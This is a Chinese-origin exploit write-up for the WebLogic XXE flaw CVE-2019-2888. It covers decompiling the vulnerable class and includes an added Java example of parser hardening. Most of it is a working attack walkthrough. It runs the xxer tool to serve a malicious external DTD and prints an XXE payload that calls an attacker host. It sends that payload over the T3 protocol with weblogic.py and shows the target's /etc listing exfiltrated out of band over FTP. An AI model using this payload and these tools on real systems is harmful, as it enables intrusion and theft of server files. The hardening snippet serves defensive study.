(CVE-2019-2888) WebLogic EJBTaglibDescriptor XXE vulnerability
1. Vulnerability overview
2. Affected versions
The EJB Container component of WebLogic Server versions 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0 is affected by this vulnerability.
3. Reproduction steps
Decompiler: fernflower.jar
Target class: weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class
╭─root@jas502n /var
╰─# find ./ |grep EJBTaglibDescriptor ✔ 8388 18:32:43
.//weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class
.//weblogic.jar/weblogic/servlet/ejb2jsp/gui/EJBTaglibDescriptorTree.class
.//weblogic.jar/weblogic/servlet/ejb2jsp/gui/EJBTaglibDescriptorPanel.class
╭─root@jas502n /var
╰─# ls ✔ 8392 18:33:22
EJBTaglibDescriptor.java fernflower.jar weblogic.jar
Decompile EJBTaglibDescriptor.class to EJBTaglibDescriptor.java:
╭─root@jas502n /var
╰─# java -jar fernflower.jar .//weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class ./
./
INFO: Decompiling class weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor
INFO: ... done
╭─root@jas502n /var
╰─# ls
EJBTaglibDescriptor.java fernflower.jar weblogic.jar
The beginning of the decompiled source (cat EJBTaglibDescriptor.java):
╭─root@jas502n /var
╰─# cat EJBTaglibDescriptor.java
package weblogic.servlet.ejb2jsp.dd;
import java.io.Externalizable;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.ObjectInput;
import java.io.ObjectOutput;
import java.io.Reader;
import java.io.StringReader;
import java.io.StringWriter;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Enumeration;
import java.util.Iterator;
import java.util.List;
import javax.xml.parsers.DocumentBuilder;
import org.w3c.dom.Element;
import org.xml.sax.InputSource;
import weblogic.servlet.ejb2jsp.BeanGenerator;
import weblogic.servlet.ejb2jsp.EJBMethodGenerator;
import weblogic.servlet.ejb2jsp.EJBTaglibGenerator;
import weblogic.servlet.ejb2jsp.HomeCollectionGenerator;
import weblogic.servlet.ejb2jsp.HomeFinderGenerator;
import weblogic.servlet.ejb2jsp.HomeMethodGenerator;
import weblogic.servlet.internal.dd.ToXML;
import weblogic.utils.Getopt2;
import weblogic.utils.classloaders.ClasspathClassLoader;
import weblogic.utils.io.XMLWriter;
import weblogic.xml.dom.DOMProcessingException;
import weblogic.xml.dom.DOMUtils;
import weblogic.xml.jaxp.WebLogicDocumentBuilderFactory;
public class EJBTaglibDescriptor implements ToXML, Externalizable {
    private static final long serialVersionUID = -9016538269900747655L;
    private FilesystemInfoDescriptor fileInfo;
    private BeanDescriptor[] beans;
    private transient ClassLoader jarLoader;
    private static final String PREAMBLE = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\n<!DOCTYPE ejb2jsp-taglib PUBLIC \"-//BEA Systems, Inc.//DTD EJB2JSP Taglib 1.0//EN\" \"http://www.bea.com/servers/wls600/dtd/weblogic-ejb2jsp.dtd\">";

    static void p(String var0) {
        System.err.println("[EJBTagDesc]: " + var0);
    }
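The decompiled fragment above stops before the parsing code, but its imports (DocumentBuilder, InputSource, StringReader, WebLogicDocumentBuilderFactory) show that the descriptor XML is handed to a DOM DocumentBuilder. The example below is added here and is not WebLogic's code: it uses the JDK's standard DocumentBuilderFactory instead of WebLogicDocumentBuilderFactory, the class name XxeHardeningDemo and the host attacker.invalid are placeholders, and the input is a constructed document in the same shape as the payload quoted in the exploitation section. It contrasts a default-configured parser, which tries to fetch the external DTD, with a hardened one that rejects the DOCTYPE before any entity can be resolved.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

public class XxeHardeningDemo {
    // Constructed input in the same shape as the payload quoted in this write-up; the
    // host is a placeholder that never resolves, so a parser that tries the fetch fails.
    static final String PAYLOAD = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
        + "<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "
        + "\"http://attacker.invalid:8989/ext.dtd\">%aaa;]><xmlrootname/>";

    // Default JDK factory: DOCTYPE accepted, external parameter entities resolved.
    static DocumentBuilder defaultBuilder() throws ParserConfigurationException {
        return DocumentBuilderFactory.newInstance().newDocumentBuilder();
    }

    // Hardened factory: refuse any DOCTYPE, so no entity can be declared at all, and
    // additionally switch off every external-resolution path in case DOCTYPEs are needed.
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }
    // Labels how a given parser handled the document: parsed, rejected, or fetch attempted.
    static String parseWith(DocumentBuilder b, String xml) {
        try {
            Document d = b.parse(new InputSource(new StringReader(xml)));
            return "parsed:" + d.getDocumentElement().getTagName();
        } catch (SAXParseException e) {
            return "rejected-by-parser:" + e.getMessage();
        } catch (Exception e) { // e.g. UnknownHostException: the external DTD fetch was tried
            return "fetch-attempted:" + e.getClass().getSimpleName();
        }
    }
    public static void main(String[] args) throws Exception {
        System.out.println("default  -> " + parseWith(defaultBuilder(), PAYLOAD));
        System.out.println("hardened -> " + parseWith(hardenedBuilder(), PAYLOAD));
    }
}
```

With the default builder the run reports fetch-attempted (the parser reached out for ext.dtd before any application code saw the document); with the hardened builder it reports rejected-by-parser.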
Exploitation
Download the Python xxer tool:
https://github.com/ianxtianxt/CVE-2019-2888
http://10.10.20.100:8989/ext.dtd
python xxer.py -p 8989 -H 10.10.20.100
_ _ _ _ ___ ___
|_'_|_'_| -_| _|
|_,_|_,_|___|_|
version 1.1
info: Old DTD found. This file is going to be deleted.
info: Generating new DTD file.
info: Starting xxer_httpd on port 8989
info: Starting xxer_ftpd on port 2121
info: Servers started. Use the following payload (with URL-encoding):
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://10.10.20.100:8989/ext.dtd">%aaa;%ccc;%ddd;]>
Send the serialized XML payload over the T3 protocol:
ale@Pentest: ~/Desktop/CVE-2019-2888# python weblogic.py 10.10.20.100 7001
_ __ __ __ _ _ ___ __ ______
| | / /__ / /_ / /___ ____ _(_)____ | |/ / |/ // ____/
| | /| / / _ \/ __ \/ / __ \/ __ `/ / ___/ | /| // __/
| |/ |/ / __/ /_/ / / /_/ / /_/ / / /__ / |/ |/ /___
|__/|__/\___/_.___/_/\____/\__, /_/\___/ /_/|_/_/|_/_____/
/____/
CVE-2019-2888 WebLogic EJBTaglibDescriptor XXE漏洞
python By jas502n
[+] XXE_IP= 10.10.20.166
[+] XXE_IP= 8989
[+] http://10.10.20.166:8989/ext.dtd
connecting to 10.10.20.100 port 7001
sending "t3 12.2.1
AS:255
HL:19
MS:10000000
PU:t3://us-l-breens:7001
"
received "HELO"
sending payload...
ale@Pentest: ~/Desktop/CVE-2019-2888#
Retrieving the /etc directory listing (received out of band on the xxer FTP listener):
root@kali:~/xxer# python xxer.py -p 8989 -H 10.10.20.166
_ _ _ _ ___ ___
|_'_|_'_| -_| _|
|_,_|_,_|___|_|
version 1.1
info: Old DTD found. This file is going to be deleted.
info: Generating new DTD file.
info: Starting xxer_httpd on port 8989
info: Starting xxer_ftpd on port 2121
info: Servers started. Use the following payload (with URL-encoding):
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://10.10.20.166:8989/ext.dtd">%aaa;%ccc;%ddd;]>
10.10.20.100 - - [01/Nov/2019 12:58:42] "GET /ext.dtd HTTP/1.1" 200 -
info: FTP: recvd 'USER fakeuser'
info: FTP: recvd 'PASS .pwd.lock
adduser.conf
alternatives
apparmor
apparmor.d
apt
bash_completion.d
bash.bashrc
bindresvport.blacklist
blkid.conf
blkid.tab
ca-certificates
ca-certificates.conf
console-setup
cron.d
cron.daily
cron.hourly
cron.monthly
cron.weekly
crontab
dbus-1
debconf.conf
debian_version